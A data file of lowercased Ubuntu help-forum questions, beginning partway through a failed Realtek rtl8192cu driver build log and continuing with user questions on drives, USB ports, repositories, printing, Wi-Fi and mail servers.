rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mlme.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/mp_custom_oid.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ip.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_ioctl_query.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal_init.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_conf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/hal8192dutesthwimg.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_linux.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/autoconf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_ce_service.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_efuse.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_cmd.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sdio_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_io.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_led.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/ieee80211_ext.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/cmd_osdep.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/sta_info.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_iol.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/usb_ops.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_hal.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_debug.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types_xp.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtl8192c_rf.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_android.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/basic_types.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_mp_phy_regdef.h rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_rf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_eeprom.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_io.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_br_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.tmp_rtw_wlan_util.o rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp_ioctl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_iol.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_p2p.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_set.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_debug.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ieee80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mlme_ext.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_pwrctrl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_security.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_query.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_ioctl_rtl.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_sta_mgt.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_wlan_util.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/.rtw_wlan_util.o.d rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/efuse/rtw_efuse.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/makefile rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/ifcfg-wlan0 rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/wlan0dhcp rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/osdep_service.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/pci_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/usb_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_cfg80211.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/xmit_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/mlme_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/ioctl_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/os_intfs.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/recv_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/sdio_intf.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/os_dep/linux/rtw_android.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/kconfig rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_sreset.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_dm.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_cmd.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_phycfg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/ rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_ce.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_led.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_halinit.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/hal8192cuhwimg_wowlan.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_linux.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/usb_ops_xp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rxdesc.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_rf6052.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/rtl8192c/rtl8192c_mp.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/hal/hal_init.c rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.8.0-30-generic/build m=/home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 modules make [ 1 ] : entrant dans le répertoire « /usr/src/linux-headers-3.8.0-30-generic » cc [ m ] /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o in file included from /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:23:0 : /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h : in function ‘thread_enter’ : /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/osdep_service.h:575:2 : error : implicit declaration of function ‘daemonize’ [ -werror=implicit-function-declaration ] daemonize ( `` % s '' , `` rtkthread '' ) ; ^ in file included from /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/drv_types.h:69:0 , from /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.c:24 : /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h : in function ‘rxmem_to_recvframe’ : /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] return ( union recv_frame* ) ( ( ( uint ) rxmem > > rxframe_align ) < < rxframe_align ) ; ^ /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/include/rtw_recv.h:626:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] return ( union recv_frame* ) ( ( ( uint ) rxmem > > rxframe_align ) < < rxframe_align ) ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/core/rtw_cmd.o ] erreur 1 make [ 1 ] : *** [ _module_/home/brice/téléchargements/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105/driver/rtl8188c_8192c_usb_linux_v3.4.4_4749.20121105 ] erreur 2 make [ 1 ] : quittant le répertoire « /usr/src/linux-headers-3.8.0-30-generic » make : *** [ modules ] erreur 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # does anyone know how to fix this ? help would be greatly appreciated , thanks !
349635	ubuntu not recognising external hard drive	the output from fdisk -l is below : 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x72078d5f device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility /dev/sda2 * 80325 30800324 15360000 7 hpfs/ntfs/exfat /dev/sda3 30800325 759169796 364184736 7 hpfs/ntfs/exfat /dev/sda4 759171070 976771071 108800001 5 extended /dev/sda5 759171072 968409087 104619008 83 linux /dev/sda6 968411136 976771071 4179968 82 linux swap / solaris after doing dmesg | tail i get this : [ 30.392242 ] init : failed to spawn hybrid-gfx main process : unable to execute : no such file or directory [ 36.588952 ] wlan0 : authenticate with 4c:17 : eb:93:72:5a [ 36.597507 ] wlan0 : send auth to 4c:17 : eb:93:72:5a ( try 1/3 ) [ 36.600400 ] wlan0 : authenticated [ 36.600605 ] wlan0 : waiting for beacon from 4c:17 : eb:93:72:5a [ 36.686606 ] wlan0 : associate with 4c:17 : eb:93:72:5a ( try 1/3 ) [ 36.691923 ] wlan0 : rx assocresp from 4c:17 : eb:93:72:5a ( capab=0x411 status=0 aid=3 ) [ 36.705582 ] wlan0 : associated [ 36.705621 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 93.510473 ] init : plymouth-stop pre-start process ( 2714 ) terminated with status 1
349641	tex editor from main-repository	i am looking for a tex editor from a main repository . since i am very causious on intalling stuff from universe i would like to avoid texmaker and kile : ( can anyone suggest a program ?
349642	editing php5.conf	i am trying to edit /etc/apache2/mods-enabled/php5.conf but when i try to do vi /etc/apache2/mods-enabled/php5.conf it just comes up as < ifmodule mod_php5.c > < filesmatch `` \.ph ( p3 ? |tml ) $ '' > sethandler application/x-httpd-php < /filesmatch > < filesmatch `` \.phps $ '' > sethandler application/x-httpd-php-source < /filesmatch > # to re-enable php in user directories comment the following lines # ( from < ifmodule ... > to < /ifmodule > . ) do not set it to on as it # prevents .htaccess files from disabling it . < ifmodule mod_userdir.c > < directory /home/*/public_html > php_admin_value engine off < /directory > < /ifmodule > < /ifmodule > ~ ~ ~ ~ ~ ~ ~ type : quit < enter > to exit vim and i can not edit it , any help ?
349649	invalid rom contents preventing boot on macbook	i 'm booting ubuntu from refind on a 15 '' macbook pro . for a long time i have n't had a problem , but just now booting has been hanging on the error invalid rom contents this seems to happen when it attempts to mount /dev/sda3 which is the ubuntu partition . i 've read that this may be related to graphics and i can boot an older version of the kernel without graphics , however nothing else that i have read has helped and i am at a loss as to what to do . any suggestions for fixing this error ?
349652	libreoffice freezes for one minute when cups server not reachable	at work , many people run linux , so it installed a cups-server . printing from various programs works reasonably well . my problem is when working at home , from where the cups-server is probably blocked by a firewall or so ( it does respond to ping , though ) . when opening an odt file , libreoffice shows a progress bar and then freezes for exactly one minute ( probably waiting for some timeout ) , after which everything seems to work normally . i have seen the same problem with impress in the past , but can not reproduce it anymore . i am running ubuntu 12.04 . the only line in /etc/cups/client.conf is : servername cupserver.mycompany.com my workaround is to comment this lines when i work at home , and uncomment it again when i need to print at work . is there a smarter way to fix this ?
349656	dhcp not working on a g780 lenovo with a ubuntu 12.04	ok here is the problem , i just bought a lenovo g780 and started installing ubuntu ( first i started in live mode ) , the wireless did n't have any problems , it connected to the wireless network and obtained ip address . when i started to install , i notices that the wireless card vanished , i said ok , maybe smth during install , everything went ok , but when i booted the system , the wireless was gone ( i could see it in the network manager ) , started searching around what might be the problem , found a solution to run update , so i did , and the wireless card appeared , but when i try to connect to a network , it keeps having problems with getting the ip from dhcp , when i manually set the ip , it works . after hours of searching i could n't find a solution , has anyone had similar problems ? is there a fix ?
349659	usb 2.0 port does not work , usb 3.0 ports do work , running ubuntu 13.04	i have 3 usb3.0 ports and 1 usb2.0 port on my laptop ( w230st clevo ) . unfortunately , the usb2.0 port does not work , despite being shown on lookup with lsusb , output shown below . strange is , that lsusb shows 3 usb2.0 ports and one usb3.0 ports - so it could be that ubuntu misinterprets the hardware . another piece of information that i can provide is that bootable usb-sticks also only work with the usb3.0 ports , and if the bootable usb-stick is plugged to the usb2.0 port it is n't even shown in the bios bootdevice menu . here the output of lsusb : user @ w230st : ~ $ lsusb bus 001 device 002 : id 8087:8008 intel corp . bus 002 device 002 : id 8087:8000 intel corp . bus 003 device 002 : id 041e:3042 creative technology , ltd bus 003 device 003 : id 8087:07da intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub and the output of lspci : user @ w230st : ~ $ lspci 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation haswell pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation haswell hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 05 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation lynx point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation lynx point pci express root port # 1 ( rev d5 ) 00:1c.2 pci bridge : intel corporation lynx point pci express root port # 3 ( rev d5 ) 00:1c.3 pci bridge : intel corporation lynx point pci express root port # 4 ( rev d5 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 05 ) 01:00.0 3d controller : nvidia corporation gk106m [ geforce gtx 765m ] ( rev ff ) 03:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5287 ( rev 01 ) 04:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 12 ) and the output of dmesg | grep usb user @ w230st : ~ $ dmesg | grep usb [ 0.669303 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 0.669440 ] ehci-pci 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 0.683055 ] ehci-pci 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 0.683107 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.683148 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.683398 ] hub 1-0:1.0 : usb hub found [ 0.683609 ] ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 0.699040 ] ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 0.699089 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.699130 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.699366 ] hub 2-0:1.0 : usb hub found [ 0.699558 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 0.699607 ] uhci_hcd : usb universal host controller interface driver [ 0.699723 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 0.699961 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 0.700002 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.700239 ] hub 3-0:1.0 : usb hub found [ 0.704226 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 0.704293 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 0.704331 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 0.706093 ] hub 4-0:1.0 : usb hub found [ 0.994752 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.127059 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=8008 [ 1.127104 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.127395 ] hub 1-1:1.0 : usb hub found [ 1.238476 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.370775 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=8000 [ 1.370777 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.370999 ] hub 2-1:1.0 : usb hub found [ 1.538132 ] usb 3-1 : new full-speed usb device number 2 using xhci_hcd [ 1.556454 ] usb 3-1 : new usb device found , idvendor=041e , idproduct=3042 [ 1.556456 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.721920 ] usb 3-7 : new full-speed usb device number 3 using xhci_hcd [ 1.742075 ] usb 3-7 : new usb device found , idvendor=8087 , idproduct=07da [ 1.742077 ] usb 3-7 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.909718 ] usb 3-8 : new high-speed usb device number 4 using xhci_hcd [ 1.985912 ] usb 3-8 : new usb device found , idvendor=5986 , idproduct=0400 [ 1.985914 ] usb 3-8 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 12.050722 ] usb video class driver ( 1.1.1 ) [ 1202.564626 ] usb 3-8 : usb disconnect , device number 4 at the moment i am kind of lost of how to best analyse the problem . i would like to know whether this is a hardware problem or one of ubuntu . here the output of dmesg | tail right after plugging an usb-stick to the 2.0 port : user @ w230st : ~ $ dmesg | tail [ 266.418505 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 266.501513 ] pci 0000:01:00.0 : power state changed by acpi to d3cold [ 266.505492 ] xhci_hcd 0000:00:14.0 : warn event trb for slot 2 ep 2 with no tds queued ? [ 266.505498 ] xhci_hcd 0000:00:14.0 : warn event trb for slot 2 ep 0 with no tds queued ? [ 269.579117 ] net_ratelimit : 135 callbacks suppressed [ 269.579133 ] r8169 0000:04:00.1 eth0 : link up [ 269.579148 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 278.254899 ] hid-generic 0005:045e:0700.0002 : unknown main item tag 0x0 [ 278.254953 ] input : microsoft bluetooth notebook mouse 5000 as /devices/pci0000:00/0000:00:14.0/usb3/3-7/3-7:1.0/bluetooth/hci0/hci0:34/input15 [ 278.255105 ] hid-generic 0005:045e:0700.0002 : input , hidraw0 : bluetooth hid v1.00 mouse [ microsoft bluetooth notebook mouse 5000 ] on b4 : b6:76:94:7c : bb note , i did not plug a bluetooth usb-stick related to the mouse , which connect directly to the laptops bluetooth . all id : usb devices found by sudo lshw : *-usb:0 description : usb controller product : lynx point usb xhci host controller vendor : intel corporation physical id : 14 bus info : pci @ 0000:00:14.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:41 memory : f7a00000-f7a0ffff *-usb:1 description : usb controller product : lynx point usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:16 memory : f7a1c000-f7a1c3ff *-usb:2 description : usb controller product : lynx point usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci-pci latency=0 resources : irq:23 memory : f7a1b000-f7a1b3ff
349661	problems with adobe flash player and software center	i 'm running ubuntu 12.04 ( 32-bit ) . i manually installed adoble flash player 9 from the software center . the problem now is that the system is not running as it used to . whenever i click on `` software center '' the screen goes blank and the start menu does not even let me find programmes . for example , the terminal can not be found and i can only find it with the hotkeys . no other programmes are to be found . how could i completely remove adobe flash player ? would that be the solution ? thank you .
349664	remove 8.04 repositories in 12.04 ?	after using ubuntu for about a year , it 's time to pose my first question . i am running ubuntu 12.04.3 and recently i 've had some issues with resynchronizing the package index files . sudo apt-get update produced these errors : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/main/source/sources 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/main/binary-amd64/packages 404 not found w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/hardy-security/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . a look at my /etc/apt/sources.list reveals the following : # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ deb http : //security.ubuntu.com/ubuntu hardy-security main deb-src http : //security.ubuntu.com/ubuntu hardy-security main deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main apparently , the file contains two hardy repositories , which cause the problem , as hardy has reached its eof , as can be seen here . i found two possible solutions to this problem : 1. change the url for the hardy repositories from http : //security.ubuntu.com/ubuntu to http : //old-releases.ubuntu.com/ubuntu ( old releases server , source ) 2. remove / replace the hardy repositories so here are the questions for you : 1. which approach should i pursue ? ( i think the second one , as using outdated repositories is n't a good idea anyways , see e.g . here ) 2. if i choose the second approach , can i simply delete the hardy-security repos ( as the corresponding precise repos are already contained ) ? is this procedure safe in terms of system stability ? thanks in advance , silvio
349668	how come my terminal 's character spacing is off unless i uncheck `` use the system fixed width font '' ?	my terminal looks like this : unless i uncheck `` use the system fixed width font '' in which case it looks like this : i noticed that the character spacing is off for applications other than the terminal . am i missing fonts ?
349669	installation process : problem with partitions	i want to install ubuntu with an usb-stick . on the installion instructions on your website it says , that at a certain point the window : installion type should appear with three different options . those are : install ubuntu alongside windows 7 , replace windows 7 with ubuntu , something else . i have windows 7 on my laptop , but the installion type window only offers me two options : replace windows 7 with ubuntu , something else . the install ubuntu alongside options does not appear . this is now my question : why not ? what could i have done wrong ? thanks for your help
349671	after 12.04 installation on dell inspiron 1520 , no wired connectivity	obviously the installation cd could use the ethernet connection . however , it did n't install/configure it . ifconfig -a only reports a 'lo ' interface . fortunately , the usb device works ... could n't it be possible to copy the device from the installation cd ? $ nm-tool networkmanager tool state : disconnected $ sudo lspci -nnk | grep -a10 -i network 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card [ 1028:0007 ] kernel driver in use : wl kernel modules : wl , ssb ok , and the ethernet controller is bcm4401-b0 ( from grepping 14e4 in the output of lspci -vvnn ) followed another thread which sent me to look at the content of /etc/network/interfaces there was only lo . so i added there eth0 , and restarted the networking service . but it is now in stop/waiting mode ... skipping service and using directly the init.d script is clearer : can not find device `` eth0 '' checked my box at work , and surprise : there 's no eth0 interface defined in /etc/network/interfaces , which does n't prevent ifconfig -a from reporting one ... removed the 'auto eth0 ' i had previously added , which allows the restart but solves nothing . ok ... now the lan is not plugged .
349673	will 64-bit version of java jdk work on 64-bit machine running 32-bit version of ubuntu ?	i have a 32-bit version of ubuntu 13.04 running on my 64-bit machine . i 'm planning to install the 32-bit version of eclipse 4.3 but i need to install java jdk first . i 've had problems finding 32-bit version of java jdk , oracle only lists 64 bit versions of java for linux . in any case , does it matter what version of java jdk i install ? will java jdk 64-bit work as well as it 's counterpart ( java jdk 32-bit ) ? i thought of installing the 64-bit version of ubuntu 13.04 but i do n't want to go through the hustle after having spent more than 12 hours upgrading from ubuntu 11.04 to 12.xx , and finally to 13.04 .
349675	webmail not displaying my maildir mails	i 'm 6 month old linux-user and i 've recently been trying to set up an e-mail server with postfix+dovecot+roundcube ( also tried squirrelmail ) . for some reason i 'm not able to see any of my e-mails inside roundcube . i 'm using maildir format for this , and i can see , send and receive e-mails correctly when using mutt but not with webmail ( nor roundcube or squirrelmail ) . how can i solve this ? thank you guys
